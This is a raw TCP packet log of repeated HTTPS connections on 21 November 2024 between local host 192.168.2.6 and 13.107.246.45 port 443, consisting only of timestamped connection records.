                                                                                                                                                                              Nov 21, 2024 08:31:23.172770023 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:23.172782898 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.237057924 CET4434993513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.237759113 CET49935443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.237783909 CET4434993513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.238317966 CET49935443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.238323927 CET4434993513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.259219885 CET4434993413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.259793997 CET49934443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.259804964 CET4434993413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.260358095 CET49934443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.260363102 CET4434993413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.470622063 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.471267939 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.471303940 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.471884012 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.471890926 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.550656080 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.551815033 CET49936443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.551883936 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.552395105 CET49936443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.552412033 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.670661926 CET4434993513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.673783064 CET4434993513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.677309990 CET49935443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.677309990 CET49935443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.677309990 CET49935443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.680107117 CET49939443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.680207014 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.680381060 CET49939443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.680562019 CET49939443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.680597067 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.712055922 CET4434993413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.715507984 CET4434993413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.719234943 CET49934443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.722037077 CET49934443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.722054005 CET4434993413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.722064972 CET49934443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.722069979 CET4434993413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.726449966 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.726500034 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.726999044 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.727149010 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.727173090 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.924721003 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.924896002 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.925028086 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.925232887 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.925251961 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.925265074 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.925271988 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.927917004 CET49941443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.927956104 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.928056955 CET49941443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.928190947 CET49941443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.928205013 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:24.984195948 CET49935443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:24.984236956 CET4434993513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:25.004210949 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:25.009701014 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:25.009757996 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:25.010107040 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:25.010122061 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:25.011167049 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:25.014307976 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:25.014379978 CET49936443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:25.014559031 CET49936443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:25.014575005 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:25.014584064 CET49936443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:25.014590025 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:25.017563105 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:25.017594099 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:25.017677069 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:25.017817020 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:25.017832041 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:25.447423935 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:25.447458029 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:25.447506905 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:25.447541952 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:25.447607040 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:25.447812080 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:25.447855949 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:25.447884083 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:25.447901011 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:25.450558901 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:25.450596094 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:25.450669050 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:25.450814962 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:25.450826883 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.453797102 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.454412937 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.454456091 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.454911947 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.454917908 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.464823961 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.465867996 CET49939443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.465924025 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.466260910 CET49939443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.466278076 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.645399094 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.646085024 CET49941443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.646105051 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.646442890 CET49941443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.646449089 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.802853107 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.803812981 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.803847075 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.804461956 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.804466963 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.887797117 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.890945911 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.891102076 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.891372919 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.891396999 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.891410112 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.891422033 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.894431114 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.894483089 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.895530939 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.895664930 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.895684958 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.908792973 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.911274910 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.915242910 CET49939443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.915309906 CET49939443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.915309906 CET49939443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.915376902 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.915404081 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.918459892 CET49945443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.918548107 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:26.919342995 CET49945443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.919460058 CET49945443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:26.919506073 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.079123974 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.082237959 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.083307028 CET49941443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.083355904 CET49941443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.083374977 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.083398104 CET49941443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.083405018 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.086337090 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.086380959 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.087233067 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.087354898 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.087359905 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.251032114 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.251053095 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.251122952 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.251149893 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.251425028 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.251430988 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.251466990 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.251604080 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.251636982 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.251677990 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.254648924 CET49947443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.254735947 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.254836082 CET49947443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.255032063 CET49947443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.255069017 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.299021006 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.299498081 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.299531937 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.299945116 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.299951077 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.752825975 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.755974054 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.756021023 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.756023884 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.756076097 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.756171942 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.756187916 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.756202936 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.756208897 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.760229111 CET49948443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.760253906 CET4434994813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:27.760370016 CET49948443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.760981083 CET49948443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:27.760993958 CET4434994813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:28.641128063 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:28.641827106 CET49945443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:28.641864061 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:28.642359018 CET49945443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:28.642365932 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:28.674926043 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:28.675354958 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:28.675380945 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:28.675810099 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:28.675815105 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:28.963080883 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:28.964049101 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:28.964076996 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:28.964633942 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:28.964642048 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.077506065 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.080775023 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.080847979 CET49945443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.080914974 CET49945443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.080914974 CET49945443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.080957890 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.080986023 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.083703041 CET49949443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.083735943 CET4434994913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.083811998 CET49949443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.083930969 CET49949443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.083944082 CET4434994913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.105221987 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.105746984 CET49947443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.105781078 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.106169939 CET49947443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.106183052 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.122165918 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.125313044 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.125371933 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.125390053 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.125456095 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.125493050 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.125511885 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.125523090 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.125528097 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.133690119 CET49950443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.133728027 CET4434995013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.133865118 CET49950443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.133956909 CET49950443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.133969069 CET4434995013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.419130087 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.422127962 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.422194004 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.422216892 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.422261953 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.422319889 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.422354937 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.422370911 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.422382116 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.422386885 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.425482988 CET49951443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.425522089 CET4434995113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.425602913 CET49951443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.425812960 CET49951443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.425828934 CET4434995113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.559385061 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.562417984 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.562490940 CET49947443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.562539101 CET49947443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.562558889 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.562582016 CET49947443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.562593937 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.565937996 CET49952443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.565969944 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.566037893 CET49952443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.566210032 CET49952443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.566221952 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.604846001 CET4434994813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.605289936 CET49948443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.605312109 CET4434994813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:29.605745077 CET49948443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:29.605750084 CET4434994813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:30.057580948 CET4434994813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:30.057661057 CET4434994813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:30.057756901 CET49948443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:30.057770014 CET4434994813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:30.058141947 CET49948443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:30.058146954 CET4434994813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:30.058185101 CET49948443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:30.058535099 CET4434994813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:30.058629036 CET4434994813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:30.058715105 CET49948443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:30.061527014 CET49953443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:30.061625957 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:30.061701059 CET49953443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:30.061908960 CET49953443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:30.061940908 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:30.862597942 CET4434994913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:30.863046885 CET49949443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:30.863060951 CET4434994913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:30.863559008 CET49949443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:30.863564968 CET4434994913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:30.913635015 CET4434995013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:30.914158106 CET49950443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:30.914185047 CET4434995013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:30.914616108 CET49950443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:30.914622068 CET4434995013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.211484909 CET4434995113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.212131023 CET49951443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.212141037 CET4434995113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.212600946 CET49951443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.212606907 CET4434995113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.306073904 CET4434994913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.306107998 CET4434994913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.306174040 CET4434994913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.306216955 CET49949443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.306237936 CET49949443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.306514025 CET49949443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.306529999 CET4434994913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.306564093 CET49949443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.306569099 CET4434994913.107.246.45192.168.2.6
